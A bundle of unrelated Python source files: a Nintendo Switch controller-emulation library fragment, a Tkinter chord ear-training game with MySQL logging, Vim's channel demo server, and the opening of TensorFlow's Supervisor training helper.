def stop_macro(self, controller_index, macro_id, block=True):
"""Used to stop a given macro by its macro ID. After
the macro has been stopped, its macro ID will show up
as a finished macro in the respective controllers
"finished_macros" list communicated in its state.
:param controller_index: The index of a given controller
:type controller_index: int
:param macro_id: The ID of a given macro (queued or running)
:type macro_id: str
:param block: A boolean variable indicating whether or not
to block until the macro is stopped, defaults to True
:type block: bool, optional
:raises ValueError: If the controller_index does not exist
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
self.task_queue.put({
"command": NxbtCommands.STOP_MACRO,
"arguments": {
"controller_index": controller_index,
"macro_id": macro_id,
}
})
if block:
while True:
finished = (self.manager_state
[controller_index]["finished_macros"])
if macro_id in finished:
break
time.sleep(1/120)
def clear_macros(self, controller_index):
"""Clears all running and queued macros on a specified
controller.
WARNING: Any blocking macro calls will continue to run
forever if this command is run.
:param controller_index: The index of a given controller
:type controller_index: int
:raises ValueError: If the controller_index does not exist
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
self.task_queue.put({
"command": NxbtCommands.CLEAR_MACROS,
"arguments": {
"controller_index": controller_index,
}
})
def clear_all_macros(self):
"""Clears all running and queued macros on all
controllers.
"""
for controller in self.manager_state.keys():
self.clear_macros(controller)
def set_controller_input(self, controller_index, input_packet):
"""Sets the controllers buttons and analog sticks for 1 cycle.
This means that exactly 1 packet will be sent to the Switch with
input specified with this method. To keep a continuous input
stream of a desired input, packets must be set at a rate that
roughly matches the set controller. Eg: An emulated Pro Controller's
input must be set at roughly 120Hz and a Joy-Con's at 60Hz.
:param controller_index: The index of the emulated controller
:type controller_index: int
:param input_packet: The input packet with the desired input. This
*must* be an instance of the create_input_packet method.
:type input_packet: dict
:raises ValueError: On bad controller index
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
self.manager_state[controller_index]["direct_input"] = input_packet
def create_input_packet(self):
"""Creates an input packet that is used to specify the input
of a controller for a single cycle.
:return: An input packet dictionary
:rtype: dict
"""
# Create a copy of the direct input packet in a thread safe manner.
# NOTE: Using the copy.deepcopy method of copying dicts IS NOT thread safe.
return json.loads(json.dumps(DIRECT_INPUT_PACKET))
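    # A minimal direct-input sketch (added for illustration; nx and holding_a are
    # hypothetical names). Packets must be resubmitted every cycle to hold an input:
    # packet = nx.create_input_packet()
    # packet["A"] = True
    # while holding_a:  # ~120Hz for a Pro Controller, per set_controller_input above
    #     nx.set_controller_input(controller_index, packet)
    #     time.sleep(1 / 120)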
def create_controller(self, controller_type, adapter_path=None,
colour_body=None, colour_buttons=None,
reconnect_address=None):
"""Used to create a Nintendo Switch controller of a
given type and colour on an (optionally) specified
bluetooth adapter.
If no Bluetooth adapter is specified, the first available
adapter is used.
If the reconnect_address is specified, the controller
will attempt to reconnect to the Switch, rather than
simply letting any Switch connect to it. To ensure
that the reconnect succeeds, the Switch must be on
and *not* on the Change Grip/Order menu.
:param controller_type: The type of controller to create
:type controller_type: ControllerTypes
:param adapter_path: The DBus path to a given Bluetooth
adapter, defaults to None
:type adapter_path: str, optional
:param colour_body: The body colour of the controller
represented by a hexadecimal colour value (a list of
three ints (0-255)), defaults to None
:type colour_body: list, optional
:param colour_buttons: The button colour of the controller
represented by a hexadecimal colour value (a list of
three ints (0-255)), defaults to None
:type colour_buttons: list, optional
:param reconnect_address: A previously connected to
Switch's Bluetooth MAC address, defaults to None
:type reconnect_address: str or list, optional
:raises ValueError: If specified adapter is unavailable
:raises ValueError: If specified adapter is in use
:return: The index of the created controller
:rtype: int
"""
if adapter_path:
if adapter_path not in self.get_available_adapters():
raise ValueError("Specified adapter is unavailable")
if adapter_path in self._adapters_in_use.keys():
raise ValueError("Specified adapter in use")
else:
# Get all adapters we can use
usable_adapters = list(
set(self.get_available_adapters()) - set(self._adapters_in_use))
if len(usable_adapters) > 0:
# Use the first available adapter
adapter_path = usable_adapters[0]
else:
raise ValueError("No adapters available")
controller_index = None
try:
self._controller_lock.acquire()
self.task_queue.put({
"command": NxbtCommands.CREATE_CONTROLLER,
"arguments": {
"controller_index": self._controller_counter,
"controller_type": controller_type,
"adapter_path": adapter_path,
"colour_body": colour_body,
"colour_buttons": colour_buttons,
"reconnect_address": reconnect_address,
}
})
controller_index = self._controller_counter
self._controller_counter += 1
self._adapters_in_use[adapter_path] = controller_index
self._controller_adapter_lookup[controller_index] = adapter_path
# Block until the controller is ready
# This needs to be done to prevent race conditions
# on Bluetooth resources.
            if isinstance(controller_index, int):
while True:
if controller_index in self.manager_state.keys():
state = self.manager_state[controller_index]
if (state["state"] == "connecting" or
state["state"] == "reconnecting" or
state["state"] == "crashed"):
break
time.sleep(1/30)
finally:
self._controller_lock.release()
return controller_index
def remove_controller(self, controller_index):
"""Terminates and removes a given controller.
:param controller_index: The index of a given controller
:type controller_index: int
:raises ValueError: If controller does not exist
"""
if controller_index not in self.manager_state.keys():
if controller_index in self._controller_adapter_lookup.keys():
# Attempt to free any adapters claimed by a crashed controller
try:
adapter_path = self._controller_adapter_lookup.pop(controller_index, None)
self._adapters_in_use.pop(adapter_path, None)
except Exception:
pass
raise ValueError("Specified controller does not exist")
self._controller_lock.acquire()
try:
adapter_path = self._controller_adapter_lookup.pop(controller_index, None)
self._adapters_in_use.pop(adapter_path, None)
finally:
self._controller_lock.release()
self.task_queue.put({
"command": NxbtCommands.REMOVE_CONTROLLER,
"arguments": {
"controller_index": controller_index,
}
})
def wait_for_connection(self, controller_index):
"""Blocks until a given controller is connected
to a Nintendo Switch.
:param controller_index: The index of a given controller
:type controller_index: int
"""
while not self.state[controller_index]["state"] == "connected":
if self.state[controller_index]["state"] == "crashed":
raise OSError("The watched controller has crashe with error",
self.state[controller_index]["errors"])
pass
def get_available_adapters(self):
"""Gets the DBus paths of all available Bluetooth
adapters.
:return: A list of available adapter paths
:rtype: list
"""
bus = dbus.SystemBus()
adapters = find_objects(bus, SERVICE_NAME, ADAPTER_INTERFACE)
bus.close()
return adapters
def get_switch_addresses(self):
"""Gets the Bluetooth MAC addresses of all
        previously connected Nintendo Switches
:return: A list of Bluetooth MAC addresses
:rtype: list
"""
return (find_devices_by_alias("Nintendo Switch"))
@property
def state(self):
"""The state of all created and running controllers.
This state is read-only and is represented as a dict.
The state dict's structure follows:
{
"controller_index"
{
"state":
"initializing" or
"connecting" or
"reconnecting" or
"connected" or
"crashed"
"finished_macros":
A list of UUIDs
"errors":
A string with the crash error
"direct_input":
A dictionary that represents all inputs
being directly input into the controller.
}
}
:return: The state dict
:rtype: dict
"""
return self.manager_state
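# An end-to-end usage sketch (added for illustration, mirroring the public API
# above; the macro text is an example only):
# nx = Nxbt()
# cidx = nx.create_controller(PRO_CONTROLLER)
# nx.wait_for_connection(cidx)
# nx.macro(cidx, "B 0.1s\n0.5s", block=True)
# nx.remove_controller(cidx)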
class _ControllerManager():
"""Used as the manager for all controllers. Each controller is
a daemon multiprocessing Process that the ControllerManager
object creates and manages.
The ControllerManager object submits messages to the respective
queues of each controller process for tasks such as macro submission
or macro clearing/stopping.
"""
def __init__(self, state, lock):
self.state = state
self.lock = lock
self.controller_resources = Manager()
self._controller_queues = {}
self._children = {}
def create_controller(self, index, controller_type, adapter_path,
colour_body=None, colour_buttons=None,
reconnect_address=None):
"""Instantiates a given controller as a multiprocessing
Process with a shared state dict and a task queue.
Configuration options are available in the form of
controller colours.
:param index: The index of the controller
:type index: int
:param controller_type: The type of Nintendo Switch controller
:type controller_type: ControllerTypes
:param adapter_path: The DBus path to the Bluetooth adapter
:type adapter_path: str
:param colour_body: A list of three ints representing the hex
colour of the controller, defaults to None
:type colour_body: list, optional
:param colour_buttons: A list of three ints representing the
hex colour of the controller, defaults to None
:type colour_buttons: list, optional
:param reconnect_address: The address of a Nintendo Switch
to reconnect to, defaults to None
:type reconnect_address: str, optional
"""
controller_queue = Queue()
controller_state = self.controller_resources.dict()
controller_state["state"] = "initializing"
controller_state["finished_macros"] = []
controller_state["errors"] = False
controller_state["direct_input"] = json.loads(json.dumps(DIRECT_INPUT_PACKET))
controller_state["colour_body"] = colour_body
controller_state["colour_buttons"] = colour_buttons
controller_state["type"] = str(controller_type)
controller_state["adapter_path"] = adapter_path
controller_state["last_connection"] = None
self._controller_queues[index] = controller_queue
self.state[index] = controller_state
server = ControllerServer(controller_type,
adapter_path=adapter_path,
lock=self.lock,
state=controller_state,
task_queue=controller_queue,
colour_body=colour_body,
colour_buttons=colour_buttons)
controller = Process(target=server.run, args=(reconnect_address,))
controller.daemon = True
self._children[index] = controller
controller.start()
def input_macro(self, index, macro, macro_id):
self._controller_queues[index].put({
"type": "macro",
"macro": macro,
"macro_id": macro_id
})
def stop_macro(self, index, macro_id):
self._controller_queues[index].put({
"type": "stop",
"macro_id": macro_id,
})
def clear_macros(self, index):
self._controller_queues[index].put({
"type": "clear",
})
def remove_controller(self, index):
self._children[index].terminate()
self.state.pop(index, None)
def shutdown(self):
# Loop over children and kill all
for index in self._children.keys():
child = self._children[index]
child.terminate()
self.controller_resources.shutdown()
|
chordnet.py
|
# import music-code modules
from music_code import MusicCode
from sql_kit import SQL_Kit
# audio
import pyaudio
import wave
# data
import numpy as np
import pandas as pd
import mysql.connector
from mysql.connector import MySQLConnection, Error
# plotting
import matplotlib.pyplot as plt
import seaborn
# GUI
from tkinter import *
import tkinter as tk
# more
from pathlib import Path
import datetime
import sys
import os
import threading
import getpass
# Generate random chord using music-code
class random_chord:
def __init__(self):
""" Generate chord with random quality, root note and waveform type """
# initialize Music-Code
self.m = MusicCode(bpm=120)
# waveform types
self.waveform_types = ['sine', 'tri', 'saw1', 'saw2', 'square', 'sine-tri', 'sine-saw', 'sine-square', 'saw-square', 'tri-saw', 'tri-square']
# chord labels
self.all_chord_labels = self.m.all_chords[:73]
# select 4 octaves for root notes
excess_notes_list = list(self.m.freq_note_table_sharp.values())
all_root_notes = []
for item in excess_notes_list:
if ('0' in item) or ('1' in item) or ('5' in item) or ('6' in item) or ('7' in item):
pass
else:
all_root_notes.append(item)
all_root_notes.sort()
self.all_root_notes = all_root_notes
def new_chord(self):
""" Generate chord """
# select random chord label
chord_label_index = int(np.random.randint(0,len(self.all_chord_labels)))
chord_label = self.all_chord_labels[chord_label_index]
# select random root note
root_note_index = int(np.random.randint(0,len(self.all_root_notes)))
root_note = self.all_root_notes[root_note_index]
# select random waveform type
waveform_type_index = np.random.randint(0,len(self.waveform_types))
waveform_type = self.waveform_types[waveform_type_index]
# generate chord using music-code
chord_waveform = self.m.chord(chord_label,root_note,waveform_type,2)
# file name
file_name_wav = root_note + ' '+ chord_label + '_' + waveform_type +'.wav'
# bounce WAV audio
chord_waveform.bounce(file_name_wav,show_visual=False)
return file_name_wav
""" Tkinter GUI with MySQL database connection """
class ChordNet(object):
def __init__(self):
# Connect and update MySQL database
self.database_connect=False
self.userID = None
self.password=None
# generate random chord
self.c = random_chord()
self.file_name = self.c.new_chord()
# set WAV file path
self.m = MusicCode(bpm=120)
self.wav_file_path = self.m.program_files_location+"archive/"+self.file_name
# parse data in file name
self.chord_name = self.file_name.split('_')[0]
self.waveform_type = self.file_name.split('_')[1][:-4]
self.user_input = None
# Tkinter attributes
self.root= tk.Tk()
self.canvas1 = tk.Canvas(self.root, width = 500, height = 350)
self.label4 = None
self.user_response = None
self.HLP = None
# MySQL connection, credentials required
def connect(self):
self.database_connect = True
self.userID = input('User ID: ')
self.password = getpass.getpass('Password: ')
"""Set up Tkinter GUI"""
def play_audio(self):
""" WAV audio playback """
global is_playing
chunk = 1024
wf = wave.open(self.wav_file_path, 'rb')
p = pyaudio.PyAudio()
stream = p.open(
format = p.get_format_from_width(wf.getsampwidth()),
channels = wf.getnchannels(),
rate = wf.getframerate(),
output = True)
data = wf.readframes(chunk)
        while data and is_playing:  # readframes returns bytes, so b'' (falsy) marks EOF; is_playing stops playback
stream.write(data)
data = wf.readframes(chunk)
stream.stop_stream()
stream.close()
p.terminate()
def press_button_play(self):
""" Tkinter Button for WAV audio playback """
global is_playing
global my_thread
is_playing = False
if not is_playing:
is_playing = True
my_thread = threading.Thread(target=self.play_audio)
my_thread.start()
def next_iteration(self):
self.c = random_chord()
self.file_name = self.c.new_chord()
self.wav_file_path = self.m.program_files_location+"archive/"+self.file_name
self.chord_name = self.file_name.split('_')[0]
self.waveform_type = self.file_name.split('_')[1][:-4]
self.label4.destroy()
def select_maj(self):
self.user_response='major'
self.submission()
def select_min(self):
self.user_response='minor'
self.submission()
def select_dom(self):
self.user_response='dominant'
self.submission()
def select_dim(self):
self.user_response='diminished'
self.submission()
def select_aug(self):
self.user_response='augmented'
self.submission()
def submission(self):
""" classify user response as correct or incorrect, display result to user, then update database """
# classify chord prediction as either correct or incorrect
if " "+self.user_response[:2] in self.chord_name:
output = 'Correct'+'\n\n'+self.chord_name
else:
output = 'Incorrect'+'\n\n'+self.chord_name
# create tkinter display to show user correct/incorrect message
self.label4 = tk.Label(self.root, text= output)
self.canvas1.create_window(250, 300, window=self.label4)
# update MySQL database
if self.database_connect:
# DATA PREP
event_datetime = datetime.datetime.now()
# actual label
if ' maj' in self.chord_name:
actual_label = 'major'
elif ' min' in self.chord_name:
actual_label = 'minor'
elif ' dom' in self.chord_name:
actual_label = 'dominant'
elif ' dim' in self.chord_name:
actual_label = 'diminished'
elif ' aug' in self.chord_name:
actual_label = 'augmented'
# load user response
response = self.user_response.lower()
# parse chord name to extract root note and chord label
chord_root_note = self.chord_name.split(' ')[0]
chord_type = ""
for item in self.chord_name.split(' ')[1:]:
chord_type = str(chord_type +" "+item)
chord_name_sql=chord_type[1:]
# update database
db = SQL_Kit(userID=self.userID, password=self.password, database='chordnet')
db.chordlog_table(chord_root_note, chord_name_sql, response, actual_label, self.waveform_type)
# if no database connection, pass
else:
pass
def main(self):
""" MAIN """
self.root.title("Chord Net")
self.canvas1.pack()
        global is_playing, my_thread  # playback state shared with play_audio/press_button_play
        is_playing = False
        my_thread = None
label1 = tk.Label(self.root, text='Chord Net')
label1.config(font=('helvetica', 24))
self.canvas1.create_window(250, 25, window=label1)
label2 = tk.Label(self.root, text='What is the quality of this chord?')
label2.config(font=('helvetica', 11))
self.canvas1.create_window(250, 75, window=label2)
label3 = tk.Label(self.root, text='major, minor, dominant, augmented or diminished')
label3.config(font=('helvetica', 8))
self.canvas1.create_window(250, 100, window=label3)
button1 = Button(self.root, text="PLAY", command=self.press_button_play)
self.canvas1.create_window(250, 150, window=button1)
button3 = Button(self.root, text="NEXT", command=self.next_iteration)
self.canvas1.create_window(250, 250, window=button3)
button4 = Button(self.root, text="MAJ", command=self.select_maj)
self.canvas1.create_window(150, 200, window=button4)
button5 = Button(self.root, text="MIN", command=self.select_min)
self.canvas1.create_window(200, 200, window=button5)
button6 = Button(self.root, text="DOM", command=self.select_dom)
self.canvas1.create_window(250, 200, window=button6)
button7 = Button(self.root, text="DIM", command=self.select_dim)
self.canvas1.create_window(300, 200, window=button7)
button8 = Button(self.root, text="AUG", command=self.select_aug)
self.canvas1.create_window(350, 200, window=button8)
self.root.mainloop()
""" SELECT * FROM table """
def select_table(self, table):
s = SQL_Kit(self.userID, self.password, 'chordnet')
data = s.select_table(table)
return data
def KPI(self, total=True):
""" Return key performance indicator (AVG % chords predicted correctly)"""
data = self.select_table('ChordLog')
correct = data[data['PredictedLabel'] == data['ActualLabel']]
# % correctly predicted in chord net
human_level_performance = (len(correct) / len(data)) * 100
# round value
human_level_performance = round(human_level_performance, 4)
return human_level_performance
def display(self):
""" KPI MOVING AVERAGE """
s = SQL_Kit(self.userID, self.password, 'chordnet')
df = s.select_table('ChordLog')
def day_of_year(datetime_entry):
return datetime_entry.timetuple().tm_yday
df['day_of_year'] = list(df.apply(lambda x: day_of_year(x['ChordDateTime']),axis=1))
day_list = list(df['day_of_year'].unique())
all_days = list(df['day_of_year'])
averages = []
for unique_day in day_list:
data = df[df['day_of_year'] <= unique_day ].copy()
correct = data[data['PredictedLabel'] == data['ActualLabel']]
# % correctly predicted in chord net
human_level_performance = (len(correct) / len(data)) * 100
averages.append(human_level_performance)
daily_count = df['day_of_year'].value_counts().sort_index()
avg_move_df = pd.DataFrame([day_list,averages]).T
avg_move_df.rename(columns={0: 'day_id', 1: 'moving_avg'},inplace=True)
avg_move_df.set_index('day_id',inplace=True)
fig1, ax1 = plt.subplots()
ax1.plot(avg_move_df.index.astype(int),avg_move_df['moving_avg'], color='mediumspringgreen')
ax1.set_title('KPI Moving AVG')
ax1.set_xlabel('day_of_year')
ax1.xaxis.set_ticks([min(all_days), max(all_days)])
ax1.set_ylabel('% Correct')
plt.show()
|
demoserver.py
|
#!/usr/bin/python
#
# Server that will accept connections from a Vim channel.
# Run this server and then in Vim you can open the channel:
# :let handle = ch_open('localhost:8765')
#
# Then Vim can send requests to the server:
# :let response = ch_sendexpr(handle, 'hello!')
#
# And you can control Vim by typing a JSON message here, e.g.:
# ["ex","echo 'hi there'"]
#
# There is no prompt, just type a line and press Enter.
# To exit cleanly type "quit<Enter>".
#
# See ":help channel-demo" in Vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
thesocket = None
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print("=== socket opened ===")
global thesocket
thesocket = self.request
while True:
try:
data = self.request.recv(4096).decode('utf-8')
except socket.error:
print("=== socket error ===")
break
except IOError:
print("=== socket closed ===")
break
if data == '':
print("=== socket closed ===")
break
print("received: {0}".format(data))
try:
decoded = json.loads(data)
except ValueError:
print("json decoding failed")
decoded = [-1, '']
# Send a response if the sequence number is positive.
# Negative numbers are used for "eval" responses.
if decoded[0] >= 0:
if decoded[1] == 'hello!':
response = "got it"
else:
response = "what?"
encoded = json.dumps([decoded[0], response])
print("sending {0}".format(encoded))
self.request.sendall(encoded.encode('utf-8'))
thesocket = None
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == "__main__":
HOST, PORT = "localhost", 8765
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print("Server loop running in thread: ", server_thread.name)
print("Listening on port {0}".format(PORT))
while True:
typed = sys.stdin.readline()
if "quit" in typed:
print("Goodbye!")
break
if thesocket is None:
print("No socket yet")
else:
print("sending {0}".format(typed))
thesocket.sendall(typed.encode('utf-8'))
server.shutdown()
server.server_close()
|
supervisor.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as _summary
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
reinitializes variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
[`tf.train.Server.create_local_server()`](#Server.create_local_server) for
details.
* Specifying `'grpc://hostname:port'` requests a session that uses
the RPC interface to a specific server, and also allows the in-process
master to access remote tensorflow workers. Often, it is
appropriate to pass `server.target` (for some `tf.train.Server`
named `server`).
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
sv.loop(60, print_loss, (sess,))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
either the optional `summary_op` and `saver` passed to the constructor, or
default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
session and check if it could be initialized automatically.
@@__init__
@@managed_session
@@prepare_or_wait_for_session
@@start_standard_services
@@start_queue_runners
@@summary_computed
@@stop
@@request_stop
@@should_stop
@@stop_on_exception
@@wait_for_stop
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
def __init__(self,
graph=None,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT,
is_chief=True,
init_op=USE_DEFAULT,
init_feed_dict=None,
local_init_op=USE_DEFAULT,
logdir=None,
summary_op=USE_DEFAULT,
saver=USE_DEFAULT,
global_step=USE_DEFAULT,
save_summaries_secs=120,
save_model_secs=600,
recovery_wait_secs=30,
stop_grace_secs=120,
checkpoint_basename="model.ckpt",
session_manager=None,
summary_writer=USE_DEFAULT,
init_fn=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
`prepare_or_wait_for_session()` to check if the model is ready to use.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from `tf.report_uninitialized_variables()`. If
`None`, the model is not checked for readiness.
ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
supervisors in `prepare_or_wait_for_session()` to check if the model is
ready to run the local_init_op.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from
`tf.report_uninitialized_variables(tf.global_variables())`. If `None`, the
model is not checked for readiness before running local_init_op.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all variables. If `None`, no initialization is done
automatically unless you pass a value for `init_fn`, see below.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
This feed dictionary will be used when `init_op` is evaluated.
local_init_op: `Operation`. Used by all supervisors to run initializations
that should run for every new supervisor instance. By default these
are table initializers and initializers for local variables.
If `None`, no further per supervisor-instance initialization is
done automatically.
logdir: A string. Optional path to a directory where to checkpoint the
model and log events for the visualizer. Used by chief supervisors.
The directory will be created if it does not exist.
summary_op: An `Operation` that returns a Summary for the event logs.
Used by chief supervisors if a `logdir` was specified. Defaults to the
operation returned from summary.merge_all(). If `None`, summaries are
not computed automatically.
saver: A Saver object. Used by chief supervisors if a `logdir` was
specified. Defaults to the saver returned by Saver().
If `None`, the model is not saved automatically.
global_step: An integer Tensor of size 1 that counts steps. The value
from 'global_step' is used in summaries and checkpoint filenames.
Defaults to the op named 'global_step' in the graph if it exists, is of
rank 1, size 1, and of type tf.int32 or tf.int64. If `None` the global
step is not recorded in summaries and checkpoint files. Used by chief
supervisors if a `logdir` was specified.
save_summaries_secs: Number of seconds between the computation of
summaries for the event log. Defaults to 120 seconds. Pass 0 to
disable summaries.
save_model_secs: Number of seconds between the creation of model
checkpoints. Defaults to 600 seconds. Pass 0 to disable checkpoints.
recovery_wait_secs: Number of seconds between checks that the model
is ready. Used by supervisors when waiting for a chief supervisor
to initialize or restore the model. Defaults to 30 seconds.
stop_grace_secs: Grace period, in seconds, given to running threads to
stop when `stop()` is called. Defaults to 120 seconds.
checkpoint_basename: The basename for checkpoint saving.
session_manager: `SessionManager`, which manages Session creation and
recovery. If it is `None`, a default `SessionManager` will be created
with the set of arguments passed in for backwards compatibility.
summary_writer: `SummaryWriter` to use or `USE_DEFAULT`. Can be `None`
to indicate that no summaries should be written.
init_fn: Optional callable used to initialize the model. Called
after the optional `init_op` is called. The callable must accept one
argument, the session being initialized.
Returns:
A `Supervisor`.
"""
# Set default values of arguments.
if graph is None:
graph = ops.get_default_graph()
with graph.as_default():
self._init_ready_op(
ready_op=ready_op, ready_for_local_init_op=ready_for_local_init_op)
self._init_init_op(init_op=init_op, init_feed_dict=init_feed_dict)
self._init_local_init_op(local_init_op=local_init_op)
self._init_saver(saver=saver)
self._init_summary_op(summary_op=summary_op)
self._init_global_step(global_step=global_step)
self._graph = graph
self._meta_graph_def = meta_graph.create_meta_graph_def(
graph_def=graph.as_graph_def(add_shapes=True),
saver_def=self._saver.saver_def if self._saver else None)
self._is_chief = is_chief
self._coord = coordinator.Coordinator()
self._recovery_wait_secs = recovery_wait_secs
self._stop_grace_secs = stop_grace_secs
self._init_fn = init_fn
# Set all attributes related to checkpointing and writing events to None.
# Afterwards, set them appropriately for chief supervisors, as these are
# the only supervisors that can write checkpoints and events.
self._logdir = None
self._save_summaries_secs = None
self._save_model_secs = None
self._save_path = None
self._summary_writer = None
if self._is_chief:
self._logdir = logdir
self._save_summaries_secs = save_summaries_secs
self._save_model_secs = save_model_secs
if self._logdir:
self._save_path = os.path.join(self._logdir, checkpoint_basename)
if summary_writer is Supervisor.USE_DEFAULT:
if self._logdir:
self._summary_writer = summary_io.SummaryWriter(self._logdir)
else:
self._summary_writer = summary_writer
self._graph_added_to_summary = False
self._init_session_manager(session_manager=session_manager)
self._verify_setup()
# The graph is not allowed to change anymore.
graph.finalize()
def _init_session_manager(self, session_manager=None):
if session_manager is None:
self._session_manager = session_manager_mod.SessionManager(
local_init_op=self._local_init_op,
ready_op=self._ready_op,
ready_for_local_init_op=self._ready_for_local_init_op,
graph=self._graph,
recovery_wait_secs=self._recovery_wait_secs)
else:
self._session_manager = session_manager
def _get_first_op_from_collection(self, key):
"""Returns the first `Operation` from a collection.
Args:
key: A string collection key.
Returns:
The first Op found in a collection, or `None` if the collection is empty.
"""
try:
op_list = ops.get_collection(key)
if len(op_list) > 1:
logging.info("Found %d %s operations. Returning the first one.",
len(op_list), key)
if op_list:
return op_list[0]
except LookupError:
pass
return None
def _init_ready_op(self,
ready_op=USE_DEFAULT,
